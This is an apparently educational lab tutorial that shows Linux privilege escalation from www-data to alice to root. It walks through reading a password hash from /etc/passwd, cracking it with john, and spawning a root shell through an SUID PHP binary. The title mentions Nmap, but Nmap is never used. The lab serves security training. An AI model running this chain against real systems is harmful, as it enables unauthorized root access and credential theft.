LabEx
Log InJoin Free

Escalate Privileges to Root via Intermediate User in Nmap

NmapBeginner
Practice Now

Introduction

In this lab, we will learn how to escalate privileges to the root user when we cannot directly escalate to root. We will achieve this by first escalating to another regular user, and then using that user's privileges to escalate to the root user. This intermediate user is referred to as a "stepping stone" user.

The goal of this lab is to escalate privileges from the www-data user to the alice user, and then from the alice user to the root user.

Initialize the Lab Environment

In this step, we will initialize the lab environment.

  1. First, open a terminal and navigate to the /home/labex/project directory:

    cd /home/labex/project

  2. Run the following command to set up the environment for the lab:

    ./env_setup.sh

This command will download and execute a script that sets up the necessary environment for the lab. After running this command, you should be switched to the www-data user, simulating an initial shell obtained through a web vulnerability.

Attempt SUID Privilege Escalation

In this step, we will attempt to escalate privileges using the SUID (Set User ID) technique. We will search for executable files with the SUID bit set, which can be executed with the permissions of the file owner (in this case, root).

  1. First, let's search for SUID executable files that the www-data user can access:

    find / -user root -perm -4000 -print 2> /dev/null > ~/www-data_suid_files.txt

    This command will search the entire file system for files owned by the root user and have the SUID bit set (permissions mode 4000).

  2. After running the command, you should see a list of SUID executable files in the www-data_suid_files.txt file. Let's examine the contents of this file:

    cat ~/www-data_suid_files.txt

However, in this case, there are no files suitable for SUID privilege escalation.

Investigate the Home Directory

Since we were unable to escalate privileges using the SUID technique, let's investigate the home directory for potential stepping stone users.

  1. First, let's save the contents of the /home directory to a file for further analysis:

    ls -alh /home > ~/home_dir_contents.txt

    This command will list the contents of the /home directory in a long format, including file sizes and permissions and save it to the home_dir_contents.txt file.

  2. Next, let's examine the contents of the home_dir_contents.txt file to identify any potential stepping:

    cat ~/home_dir_contents.txt

    You should see a directory named alice in the output, indicating the existence of a user named alice on the system.

Attempt To Escalate Privileges to the Alice User

Since the www-data user does not have access to the alice directory, we need to find a way to escalate privileges to the alice user first.

  1. Let's check the /etc/passwd file for information about the alice user:

    cat /etc/passwd | grep alice > ~/alice_info.txt

  2. Check the contents of the alice_info.txt file to view the details of the alice user

    cat ~/alice_info.txt

    Expected output:

    alice:$1$ignite$tN3eRajwqVQLh1dDmMVix0:5001:5001::/home/alice:/bin/bash

    In the output, you should see an entry for the alice user, including the password hash.

  3. To crack the password hash, we can use the john tool. Open a new terminal and run the following command:

    john ~/alice_info.txt > cracked_passwords.txt

    Example output:

    Created directory: /var/www/.john
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1g 0:00:00:00 100% 2/3 5.000g/s 6780p/s 6780c/s 6780C/s 123456..crawford
Use the "--show" option to display all of the cracked passwords reliably
Session completed

    This will start the password cracking process. Once the password is cracked, you should see the password in the cracked_passwords.txt file.

    cat ~/cracked_passwords.txt

    Example output:

    Loaded 1 password hash (md5crypt [MD5 32/64 X2])
beautiful        (alice)

  4. In this case, the password for the alice user is beautiful. Use the su command to switch to the alice user:

    su - alice

    Enter the password we cracked earlier (beautiful) when prompted.

    beautiful

  5. After successfully switching to the alice user, navigate to the alice directory and create a new file named alice.txt:

    cd /home/alice

    Create a new file named alice.txt:

    touch ~/alice.txt

    You should now have access to the alice directory and its contents.

Attempt SUID Privilege Escalation As the Alice User

Now that we have escalated privileges to the alice user, let's try the SUID privilege escalation technique again.

  1. Make sure you are in the alice user's home directory:

    cd /home/alice

    Run the following command to find files with the SUID bit set:

    find / -user root -perm -4000 -print 2> /dev/null > alice_suid_files.txt

  2. Check the contents of the alice_suid_files.txt file to view the list of SUID files:

    cat alice_suid_files.txt

    Expected output:

    ...
/var/bin/php
...

    This time, you should see an executable file /var/bin/php in the output. This file can be used for SUID privilege escalation.

  3. To escalate privileges to the root user, run the following command:

    /var/bin/php -r "pcntl_exec('/bin/sh', ['-p']);"

    This command will execute a PHP script that spawns a new shell with root privileges.

  4. You should now have a root shell, indicated by the # prompt in the terminal. Verify that you have root privileges by creating a file in the root directory:

    touch /root/root.txt

    If the file is created without any permission errors, you have successfully escalated privileges to the root user using the SUID technique.

Understand the Difference in Directory Permissions

You might be wondering why the alice user could find the SUID executable php file, while the www-data user could not. The answer lies in the directory permissions.

After last step, you should still have a shell as the root user like the one below:

sh-5.1#

  1. Let's examine the permissions of the /var/bin directory and save the output to a file:

    ls -lh /var > /root/var_permissions.txt

  2. Check the contents of the var_permissions.txt file to view the permissions of the /var directory:

    cat /root/var_permissions.txt

    Expected output:

    total 0
...
drwxr-x--- 2 alice    alice     17 Apr 15 03:48 bin
...

    In the output, you should see that the /var/bin directory is owned by the alice user and group. Other users do not have read, write, or execute permissions for this directory.

This means that when we escalated to the alice user, we gained access to files and directories that were previously inaccessible to the www-data user. This difference in permissions allowed us to find and utilize the SUID executable file for privilege escalation.

Summary

In this lab, we learned how to escalate privileges to the root user when direct root escalation is not possible. We achieved this by first escalating to the alice user, a stepping stone user, and then using the privileges of the alice user to escalate to the root user.

The key takeaway from this lab is to always be mindful of the differences in permissions between users, as these differences can sometimes be leveraged for privilege escalation. While we used a simple example in this lab, real-world scenarios may be more complex, but the core principle remains the same: exploit the differences in user permissions to achieve privilege escalation.

Related Nmap Courses
Nmap for Beginners

Nmap for Beginners

cybersecuritynmaplinux
Hands-On Network Scanning with Nmap on Linux

Hands-On Network Scanning with Nmap on Linux

cybersecuritynmaplinux
Nmap Scanning and Telnet Access

Nmap Scanning and Telnet Access

cybersecuritynmaplinux